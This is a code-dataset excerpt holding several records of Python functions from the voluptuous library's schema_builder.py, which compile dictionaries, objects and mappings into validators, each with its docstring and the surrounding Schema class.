all_default_keys = set(key for key in schema
if isinstance(key, Required) or
isinstance(key, Optional))
_compiled_schema = {}
for skey, svalue in iteritems(schema):
new_key = self._compile(skey)
new_value = self._compile(svalue)
_compiled_schema[skey] = (new_key, new_value)
candidates = list(_iterate_mapping_candidates(_compiled_schema))
# After we have the list of candidates in the correct order, we want to apply some optimization so that each
# key in the data being validated will be matched against the relevant schema keys only.
# No point in matching against different keys
additional_candidates = []
candidates_by_key = {}
for skey, (ckey, cvalue) in candidates:
if type(skey) in primitive_types:
candidates_by_key.setdefault(skey, []).append((skey, (ckey, cvalue)))
elif isinstance(skey, Marker) and type(skey.schema) in primitive_types:
candidates_by_key.setdefault(skey.schema, []).append((skey, (ckey, cvalue)))
else:
# These are wildcards such as 'int', 'str', 'Remove' and others which should be applied to all keys
additional_candidates.append((skey, (ckey, cvalue)))
def validate_mapping(path, iterable, out):
required_keys = all_required_keys.copy()
# Build a map of all provided key-value pairs.
# The type(out) is used to retain ordering in case a ordered
# map type is provided as input.
key_value_map = type(out)()
for key, value in iterable:
key_value_map[key] = value
# Insert default values for non-existing keys.
for key in all_default_keys:
if not isinstance(key.default, Undefined) and \
key.schema not in key_value_map:
# A default value has been specified for this missing
# key, insert it.
key_value_map[key.schema] = key.default()
error = None
errors = []
for key, value in key_value_map.items():
key_path = path + [key]
remove_key = False
# Optimization. Validate against the matching key first, then fallback to the rest
relevant_candidates = itertools.chain(candidates_by_key.get(key, []), additional_candidates)
# compare each given key/value against all compiled key/values
# schema key, (compiled key, compiled value)
for skey, (ckey, cvalue) in relevant_candidates:
try:
new_key = ckey(key_path, key)
except er.Invalid as e:
if len(e.path) > len(key_path):
raise
if not error or len(e.path) > len(error.path):
error = e
continue
# Backtracking is not performed once a key is selected, so if
# the value is invalid we immediately throw an exception.
exception_errors = []
# check if the key is marked for removal
is_remove = new_key is Remove
try:
cval = cvalue(key_path, value)
# include if it's not marked for removal
if not is_remove:
out[new_key] = cval
else:
remove_key = True
continue
except er.MultipleInvalid as e:
exception_errors.extend(e.errors)
except er.Invalid as e:
exception_errors.append(e)
if exception_errors:
if is_remove or remove_key:
continue
for err in exception_errors:
if len(err.path) <= len(key_path):
err.error_type = invalid_msg
errors.append(err)
# If there is a validation error for a required
# key, this means that the key was provided.
# Discard the required key so it does not
# create an additional, noisy exception.
required_keys.discard(skey)
break
# Key and value okay, mark as found in case it was
# a Required() field.
required_keys.discard(skey)
break
else:
if remove_key:
# remove key
continue
elif self.extra == ALLOW_EXTRA:
out[key] = value
elif self.extra != REMOVE_EXTRA:
errors.append(er.Invalid('extra keys not allowed', key_path))
# else REMOVE_EXTRA: ignore the key so it's removed from output
# for any required keys left that weren't found and don't have defaults:
for key in required_keys:
msg = key.msg if hasattr(key, 'msg') and key.msg else 'required key not provided'
errors.append(er.RequiredFieldInvalid(msg, path + [key]))
if errors:
raise er.MultipleInvalid(errors)
return out
return validate_mapping | Create validator for given mapping. | train | https://github.com/alecthomas/voluptuous/blob/36c8c11e2b7eb402c24866fa558473661ede9403/voluptuous/schema_builder.py#L305-L436 | null | class Schema(object):
"""A validation schema.
The schema is a Python tree-like structure where nodes are pattern
matched against corresponding trees of values.
Nodes can be values, in which case a direct comparison is used, types,
in which case an isinstance() check is performed, or callables, which will
validate and optionally convert the value.
We can equate schemas also.
For Example:
>>> v = Schema({Required('a'): unicode})
>>> v1 = Schema({Required('a'): unicode})
>>> v2 = Schema({Required('b'): unicode})
>>> assert v == v1
>>> assert v != v2
"""
_extra_to_name = {
REMOVE_EXTRA: 'REMOVE_EXTRA',
ALLOW_EXTRA: 'ALLOW_EXTRA',
PREVENT_EXTRA: 'PREVENT_EXTRA',
}
def __init__(self, schema, required=False, extra=PREVENT_EXTRA):
"""Create a new Schema.
:param schema: Validation schema. See :module:`voluptuous` for details.
:param required: Keys defined in the schema must be in the data.
:param extra: Specify how extra keys in the data are treated:
- :const:`~voluptuous.PREVENT_EXTRA`: to disallow any undefined
extra keys (raise ``Invalid``).
- :const:`~voluptuous.ALLOW_EXTRA`: to include undefined extra
keys in the output.
- :const:`~voluptuous.REMOVE_EXTRA`: to exclude undefined extra keys
from the output.
- Any value other than the above defaults to
:const:`~voluptuous.PREVENT_EXTRA`
"""
self.schema = schema
self.required = required
self.extra = int(extra) # ensure the value is an integer
self._compiled = self._compile(schema)
@classmethod
def infer(cls, data, **kwargs):
"""Create a Schema from concrete data (e.g. an API response).
For example, this will take a dict like:
{
'foo': 1,
'bar': {
'a': True,
'b': False
},
'baz': ['purple', 'monkey', 'dishwasher']
}
And return a Schema:
{
'foo': int,
'bar': {
'a': bool,
'b': bool
},
'baz': [str]
}
Note: only very basic inference is supported.
"""
def value_to_schema_type(value):
if isinstance(value, dict):
if len(value) == 0:
return dict
return {k: value_to_schema_type(v)
for k, v in iteritems(value)}
if isinstance(value, list):
if len(value) == 0:
return list
else:
return [value_to_schema_type(v)
for v in value]
return type(value)
return cls(value_to_schema_type(data), **kwargs)
def __eq__(self, other):
if not isinstance(other, Schema):
return False
return other.schema == self.schema
def __ne__(self, other):
return not (self == other)
def __str__(self):
return str(self.schema)
def __repr__(self):
return "<Schema(%s, extra=%s, required=%s) object at 0x%x>" % (
self.schema, self._extra_to_name.get(self.extra, '??'),
self.required, id(self))
def __call__(self, data):
"""Validate data against this schema."""
try:
return self._compiled([], data)
except er.MultipleInvalid:
raise
except er.Invalid as e:
raise er.MultipleInvalid([e])
# return self.validate([], self.schema, data)
def _compile(self, schema):
if schema is Extra:
return lambda _, v: v
if schema is Self:
return lambda p, v: self._compiled(p, v)
elif hasattr(schema, "__voluptuous_compile__"):
return schema.__voluptuous_compile__(self)
if isinstance(schema, Object):
return self._compile_object(schema)
if isinstance(schema, _Mapping):
return self._compile_dict(schema)
elif isinstance(schema, list):
return self._compile_list(schema)
elif isinstance(schema, tuple):
return self._compile_tuple(schema)
elif isinstance(schema, (frozenset, set)):
return self._compile_set(schema)
type_ = type(schema)
if inspect.isclass(schema):
type_ = schema
if type_ in (bool, bytes, int, long, str, unicode, float, complex, object,
list, dict, type(None)) or callable(schema):
return _compile_scalar(schema)
raise er.SchemaError('unsupported schema data type %r' %
type(schema).__name__)
def _compile_object(self, schema):
"""Validate an object.
Has the same behavior as dictionary validator but work with object
attributes.
For example:
>>> class Structure(object):
... def __init__(self, one=None, three=None):
... self.one = one
... self.three = three
...
>>> validate = Schema(Object({'one': 'two', 'three': 'four'}, cls=Structure))
>>> with raises(er.MultipleInvalid, "not a valid value for object value @ data['one']"):
... validate(Structure(one='three'))
"""
base_validate = self._compile_mapping(
schema, invalid_msg='object value')
def validate_object(path, data):
if schema.cls is not UNDEFINED and not isinstance(data, schema.cls):
raise er.ObjectInvalid('expected a {0!r}'.format(schema.cls), path)
iterable = _iterate_object(data)
iterable = ifilter(lambda item: item[1] is not None, iterable)
out = base_validate(path, iterable, {})
return type(data)(**out)
return validate_object
def _compile_dict(self, schema):
"""Validate a dictionary.
A dictionary schema can contain a set of values, or at most one
validator function/type.
A dictionary schema will only validate a dictionary:
>>> validate = Schema({})
>>> with raises(er.MultipleInvalid, 'expected a dictionary'):
... validate([])
An invalid dictionary value:
>>> validate = Schema({'one': 'two', 'three': 'four'})
>>> with raises(er.MultipleInvalid, "not a valid value for dictionary value @ data['one']"):
... validate({'one': 'three'})
An invalid key:
>>> with raises(er.MultipleInvalid, "extra keys not allowed @ data['two']"):
... validate({'two': 'three'})
Validation function, in this case the "int" type:
>>> validate = Schema({'one': 'two', 'three': 'four', int: str})
Valid integer input:
>>> validate({10: 'twenty'})
{10: 'twenty'}
By default, a "type" in the schema (in this case "int") will be used
purely to validate that the corresponding value is of that type. It
will not Coerce the value:
>>> with raises(er.MultipleInvalid, "extra keys not allowed @ data['10']"):
... validate({'10': 'twenty'})
Wrap them in the Coerce() function to achieve this:
>>> from voluptuous import Coerce
>>> validate = Schema({'one': 'two', 'three': 'four',
... Coerce(int): str})
>>> validate({'10': 'twenty'})
{10: 'twenty'}
Custom message for required key
>>> validate = Schema({Required('one', 'required'): 'two'})
>>> with raises(er.MultipleInvalid, "required @ data['one']"):
... validate({})
(This is to avoid unexpected surprises.)
Multiple errors for nested field in a dict:
>>> validate = Schema({
... 'adict': {
... 'strfield': str,
... 'intfield': int
... }
... })
>>> try:
... validate({
... 'adict': {
... 'strfield': 123,
... 'intfield': 'one'
... }
... })
... except er.MultipleInvalid as e:
... print(sorted(str(i) for i in e.errors)) # doctest: +NORMALIZE_WHITESPACE
["expected int for dictionary value @ data['adict']['intfield']",
"expected str for dictionary value @ data['adict']['strfield']"]
"""
base_validate = self._compile_mapping(
schema, invalid_msg='dictionary value')
groups_of_exclusion = {}
groups_of_inclusion = {}
for node in schema:
if isinstance(node, Exclusive):
g = groups_of_exclusion.setdefault(node.group_of_exclusion, [])
g.append(node)
elif isinstance(node, Inclusive):
g = groups_of_inclusion.setdefault(node.group_of_inclusion, [])
g.append(node)
def validate_dict(path, data):
if not isinstance(data, dict):
raise er.DictInvalid('expected a dictionary', path)
errors = []
for label, group in groups_of_exclusion.items():
exists = False
for exclusive in group:
if exclusive.schema in data:
if exists:
msg = exclusive.msg if hasattr(exclusive, 'msg') and exclusive.msg else \
"two or more values in the same group of exclusion '%s'" % label
next_path = path + [VirtualPathComponent(label)]
errors.append(er.ExclusiveInvalid(msg, next_path))
break
exists = True
if errors:
raise er.MultipleInvalid(errors)
for label, group in groups_of_inclusion.items():
included = [node.schema in data for node in group]
if any(included) and not all(included):
msg = "some but not all values in the same group of inclusion '%s'" % label
for g in group:
if hasattr(g, 'msg') and g.msg:
msg = g.msg
break
next_path = path + [VirtualPathComponent(label)]
errors.append(er.InclusiveInvalid(msg, next_path))
break
if errors:
raise er.MultipleInvalid(errors)
out = data.__class__()
return base_validate(path, iteritems(data), out)
return validate_dict
def _compile_sequence(self, schema, seq_type):
"""Validate a sequence type.
This is a sequence of valid values or validators tried in order.
>>> validator = Schema(['one', 'two', int])
>>> validator(['one'])
['one']
>>> with raises(er.MultipleInvalid, 'expected int @ data[0]'):
... validator([3.5])
>>> validator([1])
[1]
"""
_compiled = [self._compile(s) for s in schema]
seq_type_name = seq_type.__name__
def validate_sequence(path, data):
if not isinstance(data, seq_type):
raise er.SequenceTypeInvalid('expected a %s' % seq_type_name, path)
# Empty seq schema, allow any data.
if not schema:
if data:
raise er.MultipleInvalid([
er.ValueInvalid('not a valid value', [value]) for value in data
])
return data
out = []
invalid = None
errors = []
index_path = UNDEFINED
for i, value in enumerate(data):
index_path = path + [i]
invalid = None
for validate in _compiled:
try:
cval = validate(index_path, value)
if cval is not Remove: # do not include Remove values
out.append(cval)
break
except er.Invalid as e:
if len(e.path) > len(index_path):
raise
invalid = e
else:
errors.append(invalid)
if errors:
raise er.MultipleInvalid(errors)
if _isnamedtuple(data):
return type(data)(*out)
else:
return type(data)(out)
return validate_sequence
def _compile_tuple(self, schema):
"""Validate a tuple.
A tuple is a sequence of valid values or validators tried in order.
>>> validator = Schema(('one', 'two', int))
>>> validator(('one',))
('one',)
>>> with raises(er.MultipleInvalid, 'expected int @ data[0]'):
... validator((3.5,))
>>> validator((1,))
(1,)
"""
return self._compile_sequence(schema, tuple)
def _compile_list(self, schema):
"""Validate a list.
A list is a sequence of valid values or validators tried in order.
>>> validator = Schema(['one', 'two', int])
>>> validator(['one'])
['one']
>>> with raises(er.MultipleInvalid, 'expected int @ data[0]'):
... validator([3.5])
>>> validator([1])
[1]
"""
return self._compile_sequence(schema, list)
def _compile_set(self, schema):
"""Validate a set.
A set is an unordered collection of unique elements.
>>> validator = Schema({int})
>>> validator(set([42])) == set([42])
True
>>> with raises(er.Invalid, 'expected a set'):
... validator(42)
>>> with raises(er.MultipleInvalid, 'invalid value in set'):
... validator(set(['a']))
"""
type_ = type(schema)
type_name = type_.__name__
def validate_set(path, data):
if not isinstance(data, type_):
raise er.Invalid('expected a %s' % type_name, path)
_compiled = [self._compile(s) for s in schema]
errors = []
for value in data:
for validate in _compiled:
try:
validate(path, value)
break
except er.Invalid:
pass
else:
invalid = er.Invalid('invalid value in %s' % type_name, path)
errors.append(invalid)
if errors:
raise er.MultipleInvalid(errors)
return data
return validate_set
def extend(self, schema, required=None, extra=None):
"""Create a new `Schema` by merging this and the provided `schema`.
Neither this `Schema` nor the provided `schema` are modified. The
resulting `Schema` inherits the `required` and `extra` parameters of
this, unless overridden.
Both schemas must be dictionary-based.
:param schema: dictionary to extend this `Schema` with
:param required: if set, overrides `required` of this `Schema`
:param extra: if set, overrides `extra` of this `Schema`
"""
assert type(self.schema) == dict and type(schema) == dict, 'Both schemas must be dictionary-based'
result = self.schema.copy()
# returns the key that may have been passed as arugment to Marker constructor
def key_literal(key):
return (key.schema if isinstance(key, Marker) else key)
# build a map that takes the key literals to the needed objects
# literal -> Required|Optional|literal
result_key_map = dict((key_literal(key), key) for key in result)
# for each item in the extension schema, replace duplicates
# or add new keys
for key, value in iteritems(schema):
# if the key is already in the dictionary, we need to replace it
# transform key to literal before checking presence
if key_literal(key) in result_key_map:
result_key = result_key_map[key_literal(key)]
result_value = result[result_key]
# if both are dictionaries, we need to extend recursively
# create the new extended sub schema, then remove the old key and add the new one
if type(result_value) == dict and type(value) == dict:
new_value = Schema(result_value).extend(value).schema
del result[result_key]
result[key] = new_value
# one or the other or both are not sub-schemas, simple replacement is fine
# remove old key and add new one
else:
del result[result_key]
result[key] = value
# key is new and can simply be added
else:
result[key] = value
# recompile and send old object
result_cls = type(self)
result_required = (required if required is not None else self.required)
result_extra = (extra if extra is not None else self.extra)
return result_cls(result, required=result_required, extra=result_extra)
|
alecthomas/voluptuous | voluptuous/schema_builder.py | Schema._compile_object | python | def _compile_object(self, schema):
base_validate = self._compile_mapping(
schema, invalid_msg='object value')
def validate_object(path, data):
if schema.cls is not UNDEFINED and not isinstance(data, schema.cls):
raise er.ObjectInvalid('expected a {0!r}'.format(schema.cls), path)
iterable = _iterate_object(data)
iterable = ifilter(lambda item: item[1] is not None, iterable)
out = base_validate(path, iterable, {})
return type(data)(**out)
return validate_object | Validate an object.
Has the same behavior as dictionary validator but work with object
attributes.
For example:
>>> class Structure(object):
... def __init__(self, one=None, three=None):
... self.one = one
... self.three = three
...
>>> validate = Schema(Object({'one': 'two', 'three': 'four'}, cls=Structure))
>>> with raises(er.MultipleInvalid, "not a valid value for object value @ data['one']"):
... validate(Structure(one='three')) | train | https://github.com/alecthomas/voluptuous/blob/36c8c11e2b7eb402c24866fa558473661ede9403/voluptuous/schema_builder.py#L438-L467 | null | class Schema(object):
"""A validation schema.
The schema is a Python tree-like structure where nodes are pattern
matched against corresponding trees of values.
Nodes can be values, in which case a direct comparison is used, types,
in which case an isinstance() check is performed, or callables, which will
validate and optionally convert the value.
We can equate schemas also.
For Example:
>>> v = Schema({Required('a'): unicode})
>>> v1 = Schema({Required('a'): unicode})
>>> v2 = Schema({Required('b'): unicode})
>>> assert v == v1
>>> assert v != v2
"""
_extra_to_name = {
REMOVE_EXTRA: 'REMOVE_EXTRA',
ALLOW_EXTRA: 'ALLOW_EXTRA',
PREVENT_EXTRA: 'PREVENT_EXTRA',
}
def __init__(self, schema, required=False, extra=PREVENT_EXTRA):
"""Create a new Schema.
:param schema: Validation schema. See :module:`voluptuous` for details.
:param required: Keys defined in the schema must be in the data.
:param extra: Specify how extra keys in the data are treated:
- :const:`~voluptuous.PREVENT_EXTRA`: to disallow any undefined
extra keys (raise ``Invalid``).
- :const:`~voluptuous.ALLOW_EXTRA`: to include undefined extra
keys in the output.
- :const:`~voluptuous.REMOVE_EXTRA`: to exclude undefined extra keys
from the output.
- Any value other than the above defaults to
:const:`~voluptuous.PREVENT_EXTRA`
"""
self.schema = schema
self.required = required
self.extra = int(extra) # ensure the value is an integer
self._compiled = self._compile(schema)
@classmethod
def infer(cls, data, **kwargs):
"""Create a Schema from concrete data (e.g. an API response).
For example, this will take a dict like:
{
'foo': 1,
'bar': {
'a': True,
'b': False
},
'baz': ['purple', 'monkey', 'dishwasher']
}
And return a Schema:
{
'foo': int,
'bar': {
'a': bool,
'b': bool
},
'baz': [str]
}
Note: only very basic inference is supported.
"""
def value_to_schema_type(value):
if isinstance(value, dict):
if len(value) == 0:
return dict
return {k: value_to_schema_type(v)
for k, v in iteritems(value)}
if isinstance(value, list):
if len(value) == 0:
return list
else:
return [value_to_schema_type(v)
for v in value]
return type(value)
return cls(value_to_schema_type(data), **kwargs)
def __eq__(self, other):
if not isinstance(other, Schema):
return False
return other.schema == self.schema
def __ne__(self, other):
return not (self == other)
def __str__(self):
return str(self.schema)
def __repr__(self):
return "<Schema(%s, extra=%s, required=%s) object at 0x%x>" % (
self.schema, self._extra_to_name.get(self.extra, '??'),
self.required, id(self))
def __call__(self, data):
"""Validate data against this schema."""
try:
return self._compiled([], data)
except er.MultipleInvalid:
raise
except er.Invalid as e:
raise er.MultipleInvalid([e])
# return self.validate([], self.schema, data)
def _compile(self, schema):
if schema is Extra:
return lambda _, v: v
if schema is Self:
return lambda p, v: self._compiled(p, v)
elif hasattr(schema, "__voluptuous_compile__"):
return schema.__voluptuous_compile__(self)
if isinstance(schema, Object):
return self._compile_object(schema)
if isinstance(schema, _Mapping):
return self._compile_dict(schema)
elif isinstance(schema, list):
return self._compile_list(schema)
elif isinstance(schema, tuple):
return self._compile_tuple(schema)
elif isinstance(schema, (frozenset, set)):
return self._compile_set(schema)
type_ = type(schema)
if inspect.isclass(schema):
type_ = schema
if type_ in (bool, bytes, int, long, str, unicode, float, complex, object,
list, dict, type(None)) or callable(schema):
return _compile_scalar(schema)
raise er.SchemaError('unsupported schema data type %r' %
type(schema).__name__)
def _compile_mapping(self, schema, invalid_msg=None):
"""Create validator for given mapping."""
invalid_msg = invalid_msg or 'mapping value'
# Keys that may be required
all_required_keys = set(key for key in schema
if key is not Extra and
((self.required and not isinstance(key, (Optional, Remove))) or
isinstance(key, Required)))
# Keys that may have defaults
all_default_keys = set(key for key in schema
if isinstance(key, Required) or
isinstance(key, Optional))
_compiled_schema = {}
for skey, svalue in iteritems(schema):
new_key = self._compile(skey)
new_value = self._compile(svalue)
_compiled_schema[skey] = (new_key, new_value)
candidates = list(_iterate_mapping_candidates(_compiled_schema))
# After we have the list of candidates in the correct order, we want to apply some optimization so that each
# key in the data being validated will be matched against the relevant schema keys only.
# No point in matching against different keys
additional_candidates = []
candidates_by_key = {}
for skey, (ckey, cvalue) in candidates:
if type(skey) in primitive_types:
candidates_by_key.setdefault(skey, []).append((skey, (ckey, cvalue)))
elif isinstance(skey, Marker) and type(skey.schema) in primitive_types:
candidates_by_key.setdefault(skey.schema, []).append((skey, (ckey, cvalue)))
else:
# These are wildcards such as 'int', 'str', 'Remove' and others which should be applied to all keys
additional_candidates.append((skey, (ckey, cvalue)))
def validate_mapping(path, iterable, out):
required_keys = all_required_keys.copy()
# Build a map of all provided key-value pairs.
# The type(out) is used to retain ordering in case a ordered
# map type is provided as input.
key_value_map = type(out)()
for key, value in iterable:
key_value_map[key] = value
# Insert default values for non-existing keys.
for key in all_default_keys:
if not isinstance(key.default, Undefined) and \
key.schema not in key_value_map:
# A default value has been specified for this missing
# key, insert it.
key_value_map[key.schema] = key.default()
error = None
errors = []
for key, value in key_value_map.items():
key_path = path + [key]
remove_key = False
# Optimization. Validate against the matching key first, then fallback to the rest
relevant_candidates = itertools.chain(candidates_by_key.get(key, []), additional_candidates)
# compare each given key/value against all compiled key/values
# schema key, (compiled key, compiled value)
for skey, (ckey, cvalue) in relevant_candidates:
try:
new_key = ckey(key_path, key)
except er.Invalid as e:
if len(e.path) > len(key_path):
raise
if not error or len(e.path) > len(error.path):
error = e
continue
# Backtracking is not performed once a key is selected, so if
# the value is invalid we immediately throw an exception.
exception_errors = []
# check if the key is marked for removal
is_remove = new_key is Remove
try:
cval = cvalue(key_path, value)
# include if it's not marked for removal
if not is_remove:
out[new_key] = cval
else:
remove_key = True
continue
except er.MultipleInvalid as e:
exception_errors.extend(e.errors)
except er.Invalid as e:
exception_errors.append(e)
if exception_errors:
if is_remove or remove_key:
continue
for err in exception_errors:
if len(err.path) <= len(key_path):
err.error_type = invalid_msg
errors.append(err)
# If there is a validation error for a required
# key, this means that the key was provided.
# Discard the required key so it does not
# create an additional, noisy exception.
required_keys.discard(skey)
break
# Key and value okay, mark as found in case it was
# a Required() field.
required_keys.discard(skey)
break
else:
if remove_key:
# remove key
continue
elif self.extra == ALLOW_EXTRA:
out[key] = value
elif self.extra != REMOVE_EXTRA:
errors.append(er.Invalid('extra keys not allowed', key_path))
# else REMOVE_EXTRA: ignore the key so it's removed from output
# for any required keys left that weren't found and don't have defaults:
for key in required_keys:
msg = key.msg if hasattr(key, 'msg') and key.msg else 'required key not provided'
errors.append(er.RequiredFieldInvalid(msg, path + [key]))
if errors:
raise er.MultipleInvalid(errors)
return out
return validate_mapping
def _compile_dict(self, schema):
"""Validate a dictionary.
A dictionary schema can contain a set of values, or at most one
validator function/type.
A dictionary schema will only validate a dictionary:
>>> validate = Schema({})
>>> with raises(er.MultipleInvalid, 'expected a dictionary'):
... validate([])
An invalid dictionary value:
>>> validate = Schema({'one': 'two', 'three': 'four'})
>>> with raises(er.MultipleInvalid, "not a valid value for dictionary value @ data['one']"):
... validate({'one': 'three'})
An invalid key:
>>> with raises(er.MultipleInvalid, "extra keys not allowed @ data['two']"):
... validate({'two': 'three'})
Validation function, in this case the "int" type:
>>> validate = Schema({'one': 'two', 'three': 'four', int: str})
Valid integer input:
>>> validate({10: 'twenty'})
{10: 'twenty'}
By default, a "type" in the schema (in this case "int") will be used
purely to validate that the corresponding value is of that type. It
will not Coerce the value:
>>> with raises(er.MultipleInvalid, "extra keys not allowed @ data['10']"):
... validate({'10': 'twenty'})
Wrap them in the Coerce() function to achieve this:
>>> from voluptuous import Coerce
>>> validate = Schema({'one': 'two', 'three': 'four',
... Coerce(int): str})
>>> validate({'10': 'twenty'})
{10: 'twenty'}
Custom message for required key
>>> validate = Schema({Required('one', 'required'): 'two'})
>>> with raises(er.MultipleInvalid, "required @ data['one']"):
... validate({})
(This is to avoid unexpected surprises.)
Multiple errors for nested field in a dict:
>>> validate = Schema({
... 'adict': {
... 'strfield': str,
... 'intfield': int
... }
... })
>>> try:
... validate({
... 'adict': {
... 'strfield': 123,
... 'intfield': 'one'
... }
... })
... except er.MultipleInvalid as e:
... print(sorted(str(i) for i in e.errors)) # doctest: +NORMALIZE_WHITESPACE
["expected int for dictionary value @ data['adict']['intfield']",
"expected str for dictionary value @ data['adict']['strfield']"]
"""
base_validate = self._compile_mapping(
schema, invalid_msg='dictionary value')
groups_of_exclusion = {}
groups_of_inclusion = {}
for node in schema:
if isinstance(node, Exclusive):
g = groups_of_exclusion.setdefault(node.group_of_exclusion, [])
g.append(node)
elif isinstance(node, Inclusive):
g = groups_of_inclusion.setdefault(node.group_of_inclusion, [])
g.append(node)
def validate_dict(path, data):
if not isinstance(data, dict):
raise er.DictInvalid('expected a dictionary', path)
errors = []
for label, group in groups_of_exclusion.items():
exists = False
for exclusive in group:
if exclusive.schema in data:
if exists:
msg = exclusive.msg if hasattr(exclusive, 'msg') and exclusive.msg else \
"two or more values in the same group of exclusion '%s'" % label
next_path = path + [VirtualPathComponent(label)]
errors.append(er.ExclusiveInvalid(msg, next_path))
break
exists = True
if errors:
raise er.MultipleInvalid(errors)
for label, group in groups_of_inclusion.items():
included = [node.schema in data for node in group]
if any(included) and not all(included):
msg = "some but not all values in the same group of inclusion '%s'" % label
for g in group:
if hasattr(g, 'msg') and g.msg:
msg = g.msg
break
next_path = path + [VirtualPathComponent(label)]
errors.append(er.InclusiveInvalid(msg, next_path))
break
if errors:
raise er.MultipleInvalid(errors)
out = data.__class__()
return base_validate(path, iteritems(data), out)
return validate_dict
def _compile_sequence(self, schema, seq_type):
"""Validate a sequence type.
This is a sequence of valid values or validators tried in order.
>>> validator = Schema(['one', 'two', int])
>>> validator(['one'])
['one']
>>> with raises(er.MultipleInvalid, 'expected int @ data[0]'):
... validator([3.5])
>>> validator([1])
[1]
"""
_compiled = [self._compile(s) for s in schema]
seq_type_name = seq_type.__name__
def validate_sequence(path, data):
if not isinstance(data, seq_type):
raise er.SequenceTypeInvalid('expected a %s' % seq_type_name, path)
# Empty seq schema, allow any data.
if not schema:
if data:
raise er.MultipleInvalid([
er.ValueInvalid('not a valid value', [value]) for value in data
])
return data
out = []
invalid = None
errors = []
index_path = UNDEFINED
for i, value in enumerate(data):
index_path = path + [i]
invalid = None
for validate in _compiled:
try:
cval = validate(index_path, value)
if cval is not Remove: # do not include Remove values
out.append(cval)
break
except er.Invalid as e:
if len(e.path) > len(index_path):
raise
invalid = e
else:
errors.append(invalid)
if errors:
raise er.MultipleInvalid(errors)
if _isnamedtuple(data):
return type(data)(*out)
else:
return type(data)(out)
return validate_sequence
def _compile_tuple(self, schema):
"""Validate a tuple.
A tuple is a sequence of valid values or validators tried in order.
>>> validator = Schema(('one', 'two', int))
>>> validator(('one',))
('one',)
>>> with raises(er.MultipleInvalid, 'expected int @ data[0]'):
... validator((3.5,))
>>> validator((1,))
(1,)
"""
return self._compile_sequence(schema, tuple)
def _compile_list(self, schema):
"""Validate a list.
A list is a sequence of valid values or validators tried in order.
>>> validator = Schema(['one', 'two', int])
>>> validator(['one'])
['one']
>>> with raises(er.MultipleInvalid, 'expected int @ data[0]'):
... validator([3.5])
>>> validator([1])
[1]
"""
return self._compile_sequence(schema, list)
def _compile_set(self, schema):
"""Validate a set.
A set is an unordered collection of unique elements.
>>> validator = Schema({int})
>>> validator(set([42])) == set([42])
True
>>> with raises(er.Invalid, 'expected a set'):
... validator(42)
>>> with raises(er.MultipleInvalid, 'invalid value in set'):
... validator(set(['a']))
"""
type_ = type(schema)
type_name = type_.__name__
def validate_set(path, data):
if not isinstance(data, type_):
raise er.Invalid('expected a %s' % type_name, path)
_compiled = [self._compile(s) for s in schema]
errors = []
for value in data:
for validate in _compiled:
try:
validate(path, value)
break
except er.Invalid:
pass
else:
invalid = er.Invalid('invalid value in %s' % type_name, path)
errors.append(invalid)
if errors:
raise er.MultipleInvalid(errors)
return data
return validate_set
def extend(self, schema, required=None, extra=None):
"""Create a new `Schema` by merging this and the provided `schema`.
Neither this `Schema` nor the provided `schema` are modified. The
resulting `Schema` inherits the `required` and `extra` parameters of
this, unless overridden.
Both schemas must be dictionary-based.
:param schema: dictionary to extend this `Schema` with
:param required: if set, overrides `required` of this `Schema`
:param extra: if set, overrides `extra` of this `Schema`
"""
assert type(self.schema) == dict and type(schema) == dict, 'Both schemas must be dictionary-based'
result = self.schema.copy()
# returns the key that may have been passed as arugment to Marker constructor
def key_literal(key):
return (key.schema if isinstance(key, Marker) else key)
# build a map that takes the key literals to the needed objects
# literal -> Required|Optional|literal
result_key_map = dict((key_literal(key), key) for key in result)
# for each item in the extension schema, replace duplicates
# or add new keys
for key, value in iteritems(schema):
# if the key is already in the dictionary, we need to replace it
# transform key to literal before checking presence
if key_literal(key) in result_key_map:
result_key = result_key_map[key_literal(key)]
result_value = result[result_key]
# if both are dictionaries, we need to extend recursively
# create the new extended sub schema, then remove the old key and add the new one
if type(result_value) == dict and type(value) == dict:
new_value = Schema(result_value).extend(value).schema
del result[result_key]
result[key] = new_value
# one or the other or both are not sub-schemas, simple replacement is fine
# remove old key and add new one
else:
del result[result_key]
result[key] = value
# key is new and can simply be added
else:
result[key] = value
# recompile and send old object
result_cls = type(self)
result_required = (required if required is not None else self.required)
result_extra = (extra if extra is not None else self.extra)
return result_cls(result, required=result_required, extra=result_extra)
|
alecthomas/voluptuous | voluptuous/schema_builder.py | Schema._compile_dict | python | def _compile_dict(self, schema):
base_validate = self._compile_mapping(
schema, invalid_msg='dictionary value')
groups_of_exclusion = {}
groups_of_inclusion = {}
for node in schema:
if isinstance(node, Exclusive):
g = groups_of_exclusion.setdefault(node.group_of_exclusion, [])
g.append(node)
elif isinstance(node, Inclusive):
g = groups_of_inclusion.setdefault(node.group_of_inclusion, [])
g.append(node)
def validate_dict(path, data):
if not isinstance(data, dict):
raise er.DictInvalid('expected a dictionary', path)
errors = []
for label, group in groups_of_exclusion.items():
exists = False
for exclusive in group:
if exclusive.schema in data:
if exists:
msg = exclusive.msg if hasattr(exclusive, 'msg') and exclusive.msg else \
"two or more values in the same group of exclusion '%s'" % label
next_path = path + [VirtualPathComponent(label)]
errors.append(er.ExclusiveInvalid(msg, next_path))
break
exists = True
if errors:
raise er.MultipleInvalid(errors)
for label, group in groups_of_inclusion.items():
included = [node.schema in data for node in group]
if any(included) and not all(included):
msg = "some but not all values in the same group of inclusion '%s'" % label
for g in group:
if hasattr(g, 'msg') and g.msg:
msg = g.msg
break
next_path = path + [VirtualPathComponent(label)]
errors.append(er.InclusiveInvalid(msg, next_path))
break
if errors:
raise er.MultipleInvalid(errors)
out = data.__class__()
return base_validate(path, iteritems(data), out)
return validate_dict | Validate a dictionary.
A dictionary schema can contain a set of values, or at most one
validator function/type.
A dictionary schema will only validate a dictionary:
>>> validate = Schema({})
>>> with raises(er.MultipleInvalid, 'expected a dictionary'):
... validate([])
An invalid dictionary value:
>>> validate = Schema({'one': 'two', 'three': 'four'})
>>> with raises(er.MultipleInvalid, "not a valid value for dictionary value @ data['one']"):
... validate({'one': 'three'})
An invalid key:
>>> with raises(er.MultipleInvalid, "extra keys not allowed @ data['two']"):
... validate({'two': 'three'})
Validation function, in this case the "int" type:
>>> validate = Schema({'one': 'two', 'three': 'four', int: str})
Valid integer input:
>>> validate({10: 'twenty'})
{10: 'twenty'}
By default, a "type" in the schema (in this case "int") will be used
purely to validate that the corresponding value is of that type. It
will not Coerce the value:
>>> with raises(er.MultipleInvalid, "extra keys not allowed @ data['10']"):
... validate({'10': 'twenty'})
